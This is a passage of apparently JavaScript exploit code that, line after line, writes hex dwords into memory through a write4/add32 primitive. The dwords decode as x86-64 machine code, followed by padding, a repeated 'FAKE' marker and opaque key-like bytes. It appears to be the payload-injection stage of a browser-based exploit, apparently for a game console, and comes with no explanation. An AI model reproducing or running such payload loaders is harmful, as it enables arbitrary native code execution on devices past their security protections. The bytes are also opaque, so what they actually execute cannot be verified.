1225 |   p.write4(addr.add32(0x0000131c), 0xc2294805);
1226 |   p.write4(addr.add32(0x00001320), 0x3ffa8348);
1227 |   p.write4(addr.add32(0x00001324), 0x00a2860f);
1228 |   p.write4(addr.add32(0x00001328), 0xe2800000);
1229 |   p.write4(addr.add32(0x0000132c), 0x99850f0f);
1230 |   p.write4(addr.add32(0x00001330), 0x48000000);
1231 |   p.write4(addr.add32(0x00001334), 0x2006548d);
1232 |   p.write4(addr.add32(0x00001338), 0x74d28548);
1233 |   p.write4(addr.add32(0x0000133c), 0x46b70f70);
1234 |   p.write4(addr.add32(0x00001340), 0x848d480e);
1235 |   p.write4(addr.add32(0x00001344), 0xffff0001);
1236 |   p.write4(addr.add32(0x00001348), 0xc60148ff);
1237 |   p.write4(addr.add32(0x0000134c), 0x883e8148);
1238 |   p.write4(addr.add32(0x00001350), 0x75000000);
1239 |   p.write4(addr.add32(0x00001354), 0xc6834816);
1240 |   p.write4(addr.add32(0x00001358), 0x7c8d4808);
1241 |   p.write4(addr.add32(0x0000135c), 0x88ba1824);
1242 |   p.write4(addr.add32(0x00001360), 0xff000000);
1243 |   p.write4(addr.add32(0x00001364), 0x000e9b15);
1244 |   p.write4(addr.add32(0x00001368), 0x8b2deb00);
1245 |   p.write4(addr.add32(0x0000136c), 0x3d661042);
1246 |   p.write4(addr.add32(0x00001370), 0x4075fe00);
1247 |   p.write4(addr.add32(0x00001374), 0x247c8d48);
1248 |   p.write4(addr.add32(0x00001378), 0x0088ba18);
1249 |   p.write4(addr.add32(0x0000137c), 0x8d480000);
1250 |   p.write4(addr.add32(0x00001380), 0x00098735);
1251 |   p.write4(addr.add32(0x00001384), 0x7915ff00);
1252 |   p.write4(addr.add32(0x00001388), 0x4800000e);
1253 |   p.write4(addr.add32(0x0000138c), 0x1024448b);
1254 |   p.write4(addr.add32(0x00001390), 0x48008b48);
1255 |   p.write4(addr.add32(0x00001394), 0x18244489);
1256 |   p.write4(addr.add32(0x00001398), 0x24748d48);
1257 |   p.write4(addr.add32(0x0000139c), 0x0088ba18);
1258 |   p.write4(addr.add32(0x000013a0), 0x894c0000);
1259 |   p.write4(addr.add32(0x000013a4), 0x5915ffe7);
1260 |   p.write4(addr.add32(0x000013a8), 0xeb00000e);
1261 |   p.write4(addr.add32(0x000013ac), 0x0003bb14);
1262 |   p.write4(addr.add32(0x000013b0), 0x0deb0000);
1263 |   p.write4(addr.add32(0x000013b4), 0x83661d77);
1264 |   p.write4(addr.add32(0x000013b8), 0xb87402f8);
1265 |   p.write4(addr.add32(0x000013bc), 0x00002dbb);
1266 |   p.write4(addr.add32(0x000013c0), 0xebd88900);
1267 |   p.write4(addr.add32(0x000013c4), 0xffddbb2d);
1268 |   p.write4(addr.add32(0x000013c8), 0xf5ebffff);
1269 |   p.write4(addr.add32(0x000013cc), 0xffffdbbb);
1270 |   p.write4(addr.add32(0x000013d0), 0x66eeebff);
1271 |   p.write4(addr.add32(0x000013d4), 0x74fe103d);
1272 |   p.write4(addr.add32(0x000013d8), 0x183d669b);
1273 |   p.write4(addr.add32(0x000013dc), 0x48dd75fe);
1274 |   p.write4(addr.add32(0x000013e0), 0x18247c8d);
1275 |   p.write4(addr.add32(0x000013e4), 0x000088ba);
1276 |   p.write4(addr.add32(0x000013e8), 0x358d4800);
1277 |   p.write4(addr.add32(0x000013ec), 0x0000087c);
1278 |   p.write4(addr.add32(0x000013f0), 0x814893eb);
1279 |   p.write4(addr.add32(0x000013f4), 0x0000a0c4);
1280 |   p.write4(addr.add32(0x000013f8), 0x415d5b00);
1281 |   p.write4(addr.add32(0x000013fc), 0x5741c35c);
1282 |   p.write4(addr.add32(0x00001400), 0x55415641);
1283 |   p.write4(addr.add32(0x00001404), 0x53555441);
1284 |   p.write4(addr.add32(0x00001408), 0x28ec8348);
1285 |   p.write4(addr.add32(0x0000140c), 0x48fe8949);
1286 |   p.write4(addr.add32(0x00001410), 0x18247c8d);
1287 |   p.write4(addr.add32(0x00001414), 0x0d8215ff);
1288 |   p.write4(addr.add32(0x00001418), 0x83410000);
1289 |   p.write4(addr.add32(0x0000141c), 0x1d74013e);
1290 |   p.write4(addr.add32(0x00001420), 0xe8f7894c);
1291 |   p.write4(addr.add32(0x00001424), 0xfffffe10);
1292 |   p.write4(addr.add32(0x00001428), 0x1175c085);
1293 |   p.write4(addr.add32(0x0000142c), 0xfff7894c);
1294 |   p.write4(addr.add32(0x00001430), 0x000d4715);
1295 |   p.write4(addr.add32(0x00001434), 0xc0894100);
1296 |   p.write4(addr.add32(0x00001438), 0x0000ade9);
1297 |   p.write4(addr.add32(0x0000143c), 0x468b4100);
1298 |   p.write4(addr.add32(0x00001440), 0x0002ba08);
1299 |   p.write4(addr.add32(0x00001444), 0x8b4c0000);
1300 |   p.write4(addr.add32(0x00001448), 0x000d6f2d);
1301 |   p.write4(addr.add32(0x0000144c), 0x358b4800);
1302 |   p.write4(addr.add32(0x00001450), 0x00000d78);
1303 |   p.write4(addr.add32(0x00001454), 0x893e8b45);
1304 |   p.write4(addr.add32(0x00001458), 0x45082444);
1305 |   p.write4(addr.add32(0x0000145c), 0x0c65b70f);
1306 |   p.write4(addr.add32(0x00001460), 0x45b70f41);
1307 |   p.write4(addr.add32(0x00001464), 0xc401410e);
1308 |   p.write4(addr.add32(0x00001468), 0x48ec6349);
1309 |   p.write4(addr.add32(0x0000146c), 0x15ffef89);
1310 |   p.write4(addr.add32(0x00001470), 0x00000da0);
1311 |   p.write4(addr.add32(0x00001474), 0x000cb841);
1312 |   p.write4(addr.add32(0x00001478), 0x85480000);
1313 |   p.write4(addr.add32(0x0000147c), 0xc38948c0);
1314 |   p.write4(addr.add32(0x00001480), 0x8b496874);
1315 |   p.write4(addr.add32(0x00001484), 0x89483876);
1316 |   p.write4(addr.add32(0x00001488), 0xdf8948ea);
1317 |   p.write4(addr.add32(0x0000148c), 0x0d7215ff);
1318 |   p.write4(addr.add32(0x00001490), 0x8b490000);
1319 |   p.write4(addr.add32(0x00001494), 0x8948387e);
1320 |   p.write4(addr.add32(0x00001498), 0xee894cea);
1321 |   p.write4(addr.add32(0x0000149c), 0x0d6215ff);
1322 |   p.write4(addr.add32(0x000014a0), 0xc7410000);
1323 |   p.write4(addr.add32(0x000014a4), 0x00000206);
1324 |   p.write4(addr.add32(0x000014a8), 0xf7894c00);
1325 |   p.write4(addr.add32(0x000014ac), 0x08668945);
1326 |   p.write4(addr.add32(0x000014b0), 0x0cc615ff);
1327 |   p.write4(addr.add32(0x000014b4), 0x8b490000);
1328 |   p.write4(addr.add32(0x000014b8), 0x8948387e);
1329 |   p.write4(addr.add32(0x000014bc), 0xde8948ea);
1330 |   p.write4(addr.add32(0x000014c0), 0x0c244489);
1331 |   p.write4(addr.add32(0x000014c4), 0x0d3a15ff);
1332 |   p.write4(addr.add32(0x000014c8), 0x448b0000);
1333 |   p.write4(addr.add32(0x000014cc), 0x89450824);
1334 |   p.write4(addr.add32(0x000014d0), 0x358b483e);
1335 |   p.write4(addr.add32(0x000014d4), 0x00000cf4);
1336 |   p.write4(addr.add32(0x000014d8), 0x41df8948);
1337 |   p.write4(addr.add32(0x000014dc), 0xff084689);
1338 |   p.write4(addr.add32(0x000014e0), 0x000d2715);
1339 |   p.write4(addr.add32(0x000014e4), 0x448b4400);
1340 |   p.write4(addr.add32(0x000014e8), 0x83480c24);
1341 |   p.write4(addr.add32(0x000014ec), 0x445b28c4);
1342 |   p.write4(addr.add32(0x000014f0), 0x415dc089);
1343 |   p.write4(addr.add32(0x000014f4), 0x415d415c);
1344 |   p.write4(addr.add32(0x000014f8), 0xc35f415e);
1345 |   p.write4(addr.add32(0x000014fc), 0x48535641);
1346 |   p.write4(addr.add32(0x00001500), 0x4d18ec83);
1347 |   p.write4(addr.add32(0x00001504), 0x8948f685);
1348 |   p.write4(addr.add32(0x00001508), 0x4c1e74fb);
1349 |   p.write4(addr.add32(0x0000150c), 0x8948f789);
1350 |   p.write4(addr.add32(0x00001510), 0x48082454);
1351 |   p.write4(addr.add32(0x00001514), 0xe8243489);
1352 |   p.write4(addr.add32(0x00001518), 0xfffffd1c);
1353 |   p.write4(addr.add32(0x0000151c), 0x24348b48);
1354 |   p.write4(addr.add32(0x00001520), 0x8b48c085);
1355 |   p.write4(addr.add32(0x00001524), 0x75082454);
1356 |   p.write4(addr.add32(0x00001528), 0xc4834810);
1357 |   p.write4(addr.add32(0x0000152c), 0xdf894818);
1358 |   p.write4(addr.add32(0x00001530), 0xff5e415b);
1359 |   p.write4(addr.add32(0x00001534), 0x000c5b25);
1360 |   p.write4(addr.add32(0x00001538), 0x0442c700);
1361 |   p.write4(addr.add32(0x0000153c), 0x00000000);
1362 |   p.write4(addr.add32(0x00001540), 0x18c48348);
1363 |   p.write4(addr.add32(0x00001544), 0x415bc031);
1364 |   p.write4(addr.add32(0x00001548), 0x4855c35e);
1365 |   p.write4(addr.add32(0x0000154c), 0x5741e589);
1366 |   p.write4(addr.add32(0x00001550), 0x55415641);
1367 |   p.write4(addr.add32(0x00001554), 0x48535441);
1368 |   p.write4(addr.add32(0x00001558), 0x4828ec83);
1369 |   p.write4(addr.add32(0x0000155c), 0x4900458b);
1370 |   p.write4(addr.add32(0x00001560), 0x8b4cff89);
1371 |   p.write4(addr.add32(0x00001564), 0x89480866);
1372 |   p.write4(addr.add32(0x00001568), 0x6e8b4cf3);
1373 |   p.write4(addr.add32(0x0000156c), 0x768b4458);
1374 |   p.write4(addr.add32(0x00001570), 0xb88b4844);
1375 |   p.write4(addr.add32(0x00001574), 0xfffffe38);
1376 |   p.write4(addr.add32(0x00001578), 0x50468b48);
1377 |   p.write4(addr.add32(0x0000157c), 0x48ff8548);
1378 |   p.write4(addr.add32(0x00001580), 0x8bc84589);
1379 |   p.write4(addr.add32(0x00001584), 0x45894846);
1380 |   p.write4(addr.add32(0x00001588), 0xbf840fc4);
1381 |   p.write4(addr.add32(0x0000158c), 0x83000000);
1382 |   p.write4(addr.add32(0x00001590), 0x8948013f);
1383 |   p.write4(addr.add32(0x00001594), 0x1274b855);
1384 |   p.write4(addr.add32(0x00001598), 0xfffc9be8);
1385 |   p.write4(addr.add32(0x0000159c), 0x75c085ff);
1386 |   p.write4(addr.add32(0x000015a0), 0x558b4809);
1387 |   p.write4(addr.add32(0x000015a4), 0x00a4e9b8);
1388 |   p.write4(addr.add32(0x000015a8), 0x894c0000);
1389 |   p.write4(addr.add32(0x000015ac), 0xe43145e7);
1390 |   p.write4(addr.add32(0x000015b0), 0xfffc66e8);
1391 |   p.write4(addr.add32(0x000015b4), 0xc08548ff);
1392 |   p.write4(addr.add32(0x000015b8), 0x8b4c0474);
1393 |   p.write4(addr.add32(0x000015bc), 0x8b481060);
1394 |   p.write4(addr.add32(0x000015c0), 0x54e8c87d);
1395 |   p.write4(addr.add32(0x000015c4), 0x31fffffc);
1396 |   p.write4(addr.add32(0x000015c8), 0xc08548f6);
1397 |   p.write4(addr.add32(0x000015cc), 0x8b480474);
1398 |   p.write4(addr.add32(0x000015d0), 0x31451070);
1399 |   p.write4(addr.add32(0x000015d4), 0xed854dff);
1400 |   p.write4(addr.add32(0x000015d8), 0x894c1174);
1401 |   p.write4(addr.add32(0x000015dc), 0xfc39e8ef);
1402 |   p.write4(addr.add32(0x000015e0), 0x8548ffff);
1403 |   p.write4(addr.add32(0x000015e4), 0x4c0474c0);
1404 |   p.write4(addr.add32(0x000015e8), 0x4d10788b);
1405 |   p.write4(addr.add32(0x000015ec), 0x7874e485);
1406 |   p.write4(addr.add32(0x000015f0), 0x74f68548);
1407 |   p.write4(addr.add32(0x000015f4), 0xed854d73);
1408 |   p.write4(addr.add32(0x000015f8), 0x050d8b48);
1409 |   p.write4(addr.add32(0x000015fc), 0x0f00000c);
1410 |   p.write4(addr.add32(0x00001600), 0x394cc295);
1411 |   p.write4(addr.add32(0x00001604), 0x950fc86d);
1412 |   p.write4(addr.add32(0x00001608), 0x44c284c0);
1413 |   p.write4(addr.add32(0x0000160c), 0x3174f089);
1414 |   p.write4(addr.add32(0x00001610), 0x74f68545);
1415 |   p.write4(addr.add32(0x00001614), 0x00bd412c);
1416 |   p.write4(addr.add32(0x00001618), 0x48000040);
1417 |   p.write4(addr.add32(0x0000161c), 0x2945c601);
1418 |   p.write4(addr.add32(0x00001620), 0xe7894cf5);
1419 |   p.write4(addr.add32(0x00001624), 0x4cee8945);
1420 |   p.write4(addr.add32(0x00001628), 0xd1fff289);
1421 |   p.write4(addr.add32(0x0000162c), 0x4bc4558b);
1422 |   p.write4(addr.add32(0x00001630), 0x4c263c8d);
1423 |   p.write4(addr.add32(0x00001634), 0x2944fe89);
1424 |   p.write4(addr.add32(0x00001638), 0xc515ffea);
1425 |   p.write4(addr.add32(0x0000163c), 0xeb00000b);
1426 |   p.write4(addr.add32(0x00001640), 0xc4558b27);
1427 |   p.write4(addr.add32(0x00001644), 0x4cc60148);
1428 |   p.write4(addr.add32(0x00001648), 0xd1ffe789);
1429 |   p.write4(addr.add32(0x0000164c), 0x83481aeb);
1430 |   p.write4(addr.add32(0x00001650), 0x894828c4);
1431 |   p.write4(addr.add32(0x00001654), 0xff894cde);
1432 |   p.write4(addr.add32(0x00001658), 0x415c415b);
1433 |   p.write4(addr.add32(0x0000165c), 0x415e415d);
1434 |   p.write4(addr.add32(0x00001660), 0x25ff5d5f);
1435 |   p.write4(addr.add32(0x00001664), 0x00000b2c);
1436 |   p.write4(addr.add32(0x00001668), 0x000443c7);
1437 |   p.write4(addr.add32(0x0000166c), 0x48000000);
1438 |   p.write4(addr.add32(0x00001670), 0x5b28c483);
1439 |   p.write4(addr.add32(0x00001674), 0x5c41c031);
1440 |   p.write4(addr.add32(0x00001678), 0x5e415d41);
1441 |   p.write4(addr.add32(0x0000167c), 0xc35d5f41);
1442 |   p.write4(addr.add32(0x00001680), 0x0000f6e9);
1443 |   p.write4(addr.add32(0x00001684), 0x41574100);
1444 |   p.write4(addr.add32(0x00001688), 0x41554156);
1445 |   p.write4(addr.add32(0x0000168c), 0x48535554);
1446 |   p.write4(addr.add32(0x00001690), 0x6558ec83);
1447 |   p.write4(addr.add32(0x00001694), 0x253c8b4c);
1448 |   p.write4(addr.add32(0x00001698), 0x00000000);
1449 |   p.write4(addr.add32(0x0000169c), 0x41ff8548);
1450 |   p.write4(addr.add32(0x000016a0), 0x000001b9);
1451 |   p.write4(addr.add32(0x000016a4), 0xad840f00);
1452 |   p.write4(addr.add32(0x000016a8), 0x48000000);
1453 |   p.write4(addr.add32(0x000016ac), 0x1875d285);
1454 |   p.write4(addr.add32(0x000016b0), 0x4dc93145);
1455 |   p.write4(addr.add32(0x000016b4), 0x840fc085);
1456 |   p.write4(addr.add32(0x000016b8), 0x0000009c);
1457 |   p.write4(addr.add32(0x000016bc), 0x0000c749);
1458 |   p.write4(addr.add32(0x000016c0), 0xe9000000);
1459 |   p.write4(addr.add32(0x000016c4), 0x00000090);
1460 |   p.write4(addr.add32(0x000016c8), 0x48cc8949);
1461 |   p.write4(addr.add32(0x000016cc), 0x8d4cd389);
1462 |   p.write4(addr.add32(0x000016d0), 0x4d102474);
1463 |   p.write4(addr.add32(0x000016d4), 0x8948c589);
1464 |   p.write4(addr.add32(0x000016d8), 0x7c8948f5);
1465 |   p.write4(addr.add32(0x000016dc), 0xf6310824);
1466 |   p.write4(addr.add32(0x000016e0), 0x000010ba);
1467 |   p.write4(addr.add32(0x000016e4), 0xf7894c00);
1468 |   p.write4(addr.add32(0x000016e8), 0x0b0e15ff);
1469 |   p.write4(addr.add32(0x000016ec), 0x894c0000);
1470 |   p.write4(addr.add32(0x000016f0), 0x4c102464);
1471 |   p.write4(addr.add32(0x000016f4), 0x2024648d);
1472 |   p.write4(addr.add32(0x000016f8), 0x245c8948);
1473 |   p.write4(addr.add32(0x000016fc), 0xbaf63118);
1474 |   p.write4(addr.add32(0x00001700), 0x00000030);
1475 |   p.write4(addr.add32(0x00001704), 0xffe7894c);
1476 |   p.write4(addr.add32(0x00001708), 0x000aef15);
1477 |   p.write4(addr.add32(0x0000170c), 0x74894c00);
1478 |   p.write4(addr.add32(0x00001710), 0x8b482024);
1479 |   p.write4(addr.add32(0x00001714), 0xc708247c);
1480 |   p.write4(addr.add32(0x00001718), 0x01282444);
1481 |   p.write4(addr.add32(0x0000171c), 0x48000000);
1482 |   p.write4(addr.add32(0x00001720), 0x30246c89);
1483 |   p.write4(addr.add32(0x00001724), 0x48e6894c);
1484 |   p.write4(addr.add32(0x00001728), 0x38245c89);
1485 |   p.write4(addr.add32(0x0000172c), 0x402444c7);
1486 |   p.write4(addr.add32(0x00001730), 0x00000001);
1487 |   p.write4(addr.add32(0x00001734), 0x442444c7);
1488 |   p.write4(addr.add32(0x00001738), 0x00000001);
1489 |   p.write4(addr.add32(0x0000173c), 0x247c894c);
1490 |   p.write4(addr.add32(0x00001740), 0xdd15ff48);
1491 |   p.write4(addr.add32(0x00001744), 0x4d000009);
1492 |   p.write4(addr.add32(0x00001748), 0x8941ed85);
1493 |   p.write4(addr.add32(0x0000174c), 0x480974c1);
1494 |   p.write4(addr.add32(0x00001750), 0x38245c2b);
1495 |   p.write4(addr.add32(0x00001754), 0x005d8949);
1496 |   p.write4(addr.add32(0x00001758), 0x58c48348);
1497 |   p.write4(addr.add32(0x0000175c), 0x5bc88944);
1498 |   p.write4(addr.add32(0x00001760), 0x415c415d);
1499 |   p.write4(addr.add32(0x00001764), 0x415e415d);
1500 |   p.write4(addr.add32(0x00001768), 0x8948c35f);
1501 |   p.write4(addr.add32(0x0000176c), 0x003880f8);
1502 |   p.write4(addr.add32(0x00001770), 0xff480574);
1503 |   p.write4(addr.add32(0x00001774), 0x48f6ebc0);
1504 |   p.write4(addr.add32(0x00001778), 0x41c3f829);
1505 |   p.write4(addr.add32(0x0000177c), 0x41564157);
1506 |   p.write4(addr.add32(0x00001780), 0x55544155);
1507 |   p.write4(addr.add32(0x00001784), 0xec834853);
1508 |   p.write4(addr.add32(0x00001788), 0x058b4848);
1509 |   p.write4(addr.add32(0x0000178c), 0x00000a14);
1510 |   p.write4(addr.add32(0x00001790), 0x247c8d48);
1511 |   p.write4(addr.add32(0x00001794), 0x358d4820);
1512 |   p.write4(addr.add32(0x00001798), 0x00000630);
1513 |   p.write4(addr.add32(0x0000179c), 0x000008b9);
1514 |   p.write4(addr.add32(0x000017a0), 0x48a5f300);
1515 |   p.write4(addr.add32(0x000017a4), 0x8d4c288b);
1516 |   p.write4(addr.add32(0x000017a8), 0x83202474);
1517 |   p.write4(addr.add32(0x000017ac), 0x0000b0bd);
1518 |   p.write4(addr.add32(0x000017b0), 0x41742900);
1519 |   p.write4(addr.add32(0x000017b4), 0x006d8b48);
1520 |   p.write4(addr.add32(0x000017b8), 0x75ed8548);
1521 |   p.write4(addr.add32(0x000017bc), 0xff2cebee);
1522 |   p.write4(addr.add32(0x000017c0), 0x00094715);
1523 |   p.write4(addr.add32(0x000017c4), 0x48f63100);
1524 |   p.write4(addr.add32(0x000017c8), 0x1824548d);
1525 |   p.write4(addr.add32(0x000017cc), 0xffdf8948);
1526 |   p.write4(addr.add32(0x000017d0), 0x00092715);
1527 |   p.write4(addr.add32(0x000017d4), 0x74c08500);
1528 |   p.write4(addr.add32(0x000017d8), 0xdf894853);
1529 |   p.write4(addr.add32(0x000017dc), 0x092215ff);
1530 |   p.write4(addr.add32(0x000017e0), 0x89480000);
1531 |   p.write4(addr.add32(0x000017e4), 0x2915ffdf);
1532 |   p.write4(addr.add32(0x000017e8), 0xb8000009);
1533 |   p.write4(addr.add32(0x000017ec), 0x00000001);
1534 |   p.write4(addr.add32(0x000017f0), 0x0001aae9);
1535 |   p.write4(addr.add32(0x000017f4), 0x44c74800);
1536 |   p.write4(addr.add32(0x000017f8), 0x00001824);
1537 |   p.write4(addr.add32(0x000017fc), 0x89480000);
1538 |   p.write4(addr.add32(0x00001800), 0x1515ffef);
1539 |   p.write4(addr.add32(0x00001804), 0x48000009);
1540 |   p.write4(addr.add32(0x00001808), 0x8948c085);
1541 |   p.write4(addr.add32(0x0000180c), 0x44dc74c3);
1542 |   p.write4(addr.add32(0x00001810), 0x0100ab8b);
1543 |   p.write4(addr.add32(0x00001814), 0x89480000);
1544 |   p.write4(addr.add32(0x00001818), 0xed8545df);
1545 |   p.write4(addr.add32(0x0000181c), 0x15ffa175);
1546 |   p.write4(addr.add32(0x00001820), 0x000008f0);
1547 |   p.write4(addr.add32(0x00001824), 0xe9e43145);
1548 |   p.write4(addr.add32(0x00001828), 0x000000ab);
1549 |   p.write4(addr.add32(0x0000182c), 0x44c56349);
1550 |   p.write4(addr.add32(0x00001830), 0x8b48ef89);
1551 |   p.write4(addr.add32(0x00001834), 0x00099335);
1552 |   p.write4(addr.add32(0x00001838), 0x06e7c100);
1553 |   p.write4(addr.add32(0x0000183c), 0x24048948);
1554 |   p.write4(addr.add32(0x00001840), 0x000002ba);
1555 |   p.write4(addr.add32(0x00001844), 0xc915ff00);
1556 |   p.write4(addr.add32(0x00001848), 0x48000009);
1557 |   p.write4(addr.add32(0x0000184c), 0x8949c085);
1558 |   p.write4(addr.add32(0x00001850), 0x488674c4);
1559 |   p.write4(addr.add32(0x00001854), 0x3145c189);
1560 |   p.write4(addr.add32(0x00001858), 0x4865ebff);
1561 |   p.write4(addr.add32(0x0000185c), 0x1824748b);
1562 |   p.write4(addr.add32(0x00001860), 0x48cf8948);
1563 |   p.write4(addr.add32(0x00001864), 0x08244c89);
1564 |   p.write4(addr.add32(0x00001868), 0x20468b48);
1565 |   p.write4(addr.add32(0x0000186c), 0x8dc68148);
1566 |   p.write4(addr.add32(0x00001870), 0x48000000);
1567 |   p.write4(addr.add32(0x00001874), 0x48204189);
1568 |   p.write4(addr.add32(0x00001878), 0x489b468b);
1569 |   p.write4(addr.add32(0x0000187c), 0x48284189);
1570 |   p.write4(addr.add32(0x00001880), 0x48c3468b);
1571 |   p.write4(addr.add32(0x00001884), 0x8b304189);
1572 |   p.write4(addr.add32(0x00001888), 0xc289cf46);
1573 |   p.write4(addr.add32(0x0000188c), 0x08eac166);
1574 |   p.write4(addr.add32(0x00001890), 0x20bad021);
1575 |   p.write4(addr.add32(0x00001894), 0x66000000);
1576 |   p.write4(addr.add32(0x00001898), 0xff384189);
1577 |   p.write4(addr.add32(0x0000189c), 0x00096315);
1578 |   p.write4(addr.add32(0x000018a0), 0x448b4800);
1579 |   p.write4(addr.add32(0x000018a4), 0x8b481824);
1580 |   p.write4(addr.add32(0x000018a8), 0x4808244c);
1581 |   p.write4(addr.add32(0x000018ac), 0x4808408b);
1582 |   p.write4(addr.add32(0x000018b0), 0x4840c183);
1583 |   p.write4(addr.add32(0x000018b4), 0x8948c085);
1584 |   p.write4(addr.add32(0x000018b8), 0x74182444);
1585 |   p.write4(addr.add32(0x000018bc), 0xc7ff4108);
1586 |   p.write4(addr.add32(0x000018c0), 0x7ffd3945);
1587 |   p.write4(addr.add32(0x000018c4), 0xdf894896);
1588 |   p.write4(addr.add32(0x000018c8), 0x083615ff);
1589 |   p.write4(addr.add32(0x000018cc), 0x89480000);
1590 |   p.write4(addr.add32(0x000018d0), 0x3d15ffdf);
1591 |   p.write4(addr.add32(0x000018d4), 0x4c000008);
1592 |   p.write4(addr.add32(0x000018d8), 0xc031e289);
1593 |   p.write4(addr.add32(0x000018dc), 0x48d18948);
1594 |   p.write4(addr.add32(0x000018e0), 0x8348c0ff);
1595 |   p.write4(addr.add32(0x000018e4), 0x836640c2);
1596 |   p.write4(addr.add32(0x000018e8), 0x75053879);
1597 |   p.write4(addr.add32(0x000018ec), 0x598b481c);
1598 |   p.write4(addr.add32(0x000018f0), 0x0001b820);
1599 |   p.write4(addr.add32(0x000018f4), 0x85480000);
1600 |   p.write4(addr.add32(0x000018f8), 0x85840fdb);
1601 |   p.write4(addr.add32(0x000018fc), 0x45000000);
1602 |   p.write4(addr.add32(0x00001900), 0x8d4cff31);
1603 |   p.write4(addr.add32(0x00001904), 0xeb18246c);
1604 |   p.write4(addr.add32(0x00001908), 0x043b4813);
1605 |   p.write4(addr.add32(0x0000190c), 0xb8cd7524);
1606 |   p.write4(addr.add32(0x00001910), 0x00000001);
1607 |   p.write4(addr.add32(0x00001914), 0x83496eeb);
1608 |   p.write4(addr.add32(0x00001918), 0x287420ff);
1609 |   p.write4(addr.add32(0x0000191c), 0x3e348b43);
1610 |   p.write4(addr.add32(0x00001920), 0x48e8894d);
1611 |   p.write4(addr.add32(0x00001924), 0x046a0d8d);
1612 |   p.write4(addr.add32(0x00001928), 0x05ba0000);
1613 |   p.write4(addr.add32(0x0000192c), 0x48000000);
1614 |   p.write4(addr.add32(0x00001930), 0x8349ef89);
1615 |   p.write4(addr.add32(0x00001934), 0x014804c7);
1616 |   p.write4(addr.add32(0x00001938), 0xfd47e8de);
1617 |   p.write4(addr.add32(0x0000193c), 0xc085ffff);
1618 |   p.write4(addr.add32(0x00001940), 0x40ebd474);
1619 |   p.write4(addr.add32(0x00001944), 0x02b38d48);
1620 |   p.write4(addr.add32(0x00001948), 0x4d003e06);
1621 |   p.write4(addr.add32(0x0000194c), 0x8d48e889);
1622 |   p.write4(addr.add32(0x00001950), 0x0004570d);
1623 |   p.write4(addr.add32(0x00001954), 0x0008ba00);
1624 |   p.write4(addr.add32(0x00001958), 0x89480000);
1625 |   p.write4(addr.add32(0x0000195c), 0xfd23e8ef);
1626 |   p.write4(addr.add32(0x00001960), 0xc085ffff);
1627 |   p.write4(addr.add32(0x00001964), 0x8d481e75);
1628 |   p.write4(addr.add32(0x00001968), 0xea96a7b3);
1629 |   p.write4(addr.add32(0x0000196c), 0xe8894d00);
1630 |   p.write4(addr.add32(0x00001970), 0x3e0d8d48);
1631 |   p.write4(addr.add32(0x00001974), 0xba000004);
1632 |   p.write4(addr.add32(0x00001978), 0x00000005);
1633 |   p.write4(addr.add32(0x0000197c), 0xe8ef8948);
1634 |   p.write4(addr.add32(0x00001980), 0xfffffd01);
1635 |   p.write4(addr.add32(0x00001984), 0x74e4854d);
1636 |   p.write4(addr.add32(0x00001988), 0x358b4816);
1637 |   p.write4(addr.add32(0x0000198c), 0x0000083c);
1638 |   p.write4(addr.add32(0x00001990), 0x4c240489);
1639 |   p.write4(addr.add32(0x00001994), 0x15ffe789);
1640 |   p.write4(addr.add32(0x00001998), 0x00000870);
1641 |   p.write4(addr.add32(0x0000199c), 0x4824048b);
1642 |   p.write4(addr.add32(0x000019a0), 0x5b48c483);
1643 |   p.write4(addr.add32(0x000019a4), 0x415c415d);
1644 |   p.write4(addr.add32(0x000019a8), 0x415e415d);
1645 |   p.write4(addr.add32(0x000019ac), 0x0000c35f);
1646 |   p.write4(addr.add32(0x000019b0), 0x00000000);
1647 |   p.write4(addr.add32(0x000019b4), 0x00000000);
1648 |   p.write4(addr.add32(0x000019b8), 0x00000000);
1649 |   p.write4(addr.add32(0x000019bc), 0x00000000);
1650 |   p.write4(addr.add32(0x000019c0), 0x00000000);
1651 |   p.write4(addr.add32(0x000019c4), 0x00000000);
1652 |   p.write4(addr.add32(0x000019c8), 0x00000000);
1653 |   p.write4(addr.add32(0x000019cc), 0x454b4146);
1654 |   p.write4(addr.add32(0x000019d0), 0x454b4146);
1655 |   p.write4(addr.add32(0x000019d4), 0x454b4146);
1656 |   p.write4(addr.add32(0x000019d8), 0x454b4146);
1657 |   p.write4(addr.add32(0x000019dc), 0x8d26c296);
1658 |   p.write4(addr.add32(0x000019e0), 0x8b1c2669);
1659 |   p.write4(addr.add32(0x000019e4), 0xff6b3b1e);
1660 |   p.write4(addr.add32(0x000019e8), 0x124ee02f);
1661 |   p.write4(addr.add32(0x000019ec), 0x7eb873f5);
1662 |   p.write4(addr.add32(0x000019f0), 0x877c985c);
1663 |   p.write4(addr.add32(0x000019f4), 0xaedaf167);
1664 |   p.write4(addr.add32(0x000019f8), 0xab4bf9a0);
1665 |   p.write4(addr.add32(0x000019fc), 0x64ced877);
1666 |   p.write4(addr.add32(0x00001a00), 0xa64fc16a);
1667 |   p.write4(addr.add32(0x00001a04), 0xccaab99b);
1668 |   p.write4(addr.add32(0x00001a08), 0x3fa40976);
1669 |   p.write4(addr.add32(0x00001a0c), 0x62f5fab9);
1670 |   p.write4(addr.add32(0x00001a10), 0x49b80a84);
1671 |   p.write4(addr.add32(0x00001a14), 0xc49edf02);
1672 |   p.write4(addr.add32(0x00001a18), 0x56d3371a);
1673 |   p.write4(addr.add32(0x00001a1c), 0x156ea40d);
1674 |   p.write4(addr.add32(0x00001a20), 0x8da01507);
1675 |   p.write4(addr.add32(0x00001a24), 0x20929d97);
1676 |   p.write4(addr.add32(0x00001a28), 0xb2c35243);
1677 |   p.write4(addr.add32(0x00001a2c), 0xf3d3f7fd);
1678 |   p.write4(addr.add32(0x00001a30), 0x4f28a269);
1679 |   p.write4(addr.add32(0x00001a34), 0x40806f62);
1680 |   p.write4(addr.add32(0x00001a38), 0x1e803b5f);
1681 |   p.write4(addr.add32(0x00001a3c), 0x8b0d385e);
1682 |   p.write4(addr.add32(0x00001a40), 0x5856a856);
1683 |   p.write4(addr.add32(0x00001a44), 0xea6fd9d8);
1684 |   p.write4(addr.add32(0x00001a48), 0x16402a12);
1685 |   p.write4(addr.add32(0x00001a4c), 0x273dedc1);
1686 |   p.write4(addr.add32(0x00001a50), 0x9763a016);
1687 |   p.write4(addr.add32(0x00001a54), 0xcc553961);
1688 |   p.write4(addr.add32(0x00001a58), 0x08fa058a);
1689 |   p.write4(addr.add32(0x00001a5c), 0x5655fd28);
1690 |   p.write4(addr.add32(0x00001a60), 0x05659431);
1691 |   p.write4(addr.add32(0x00001a64), 0x6c57d3e7);
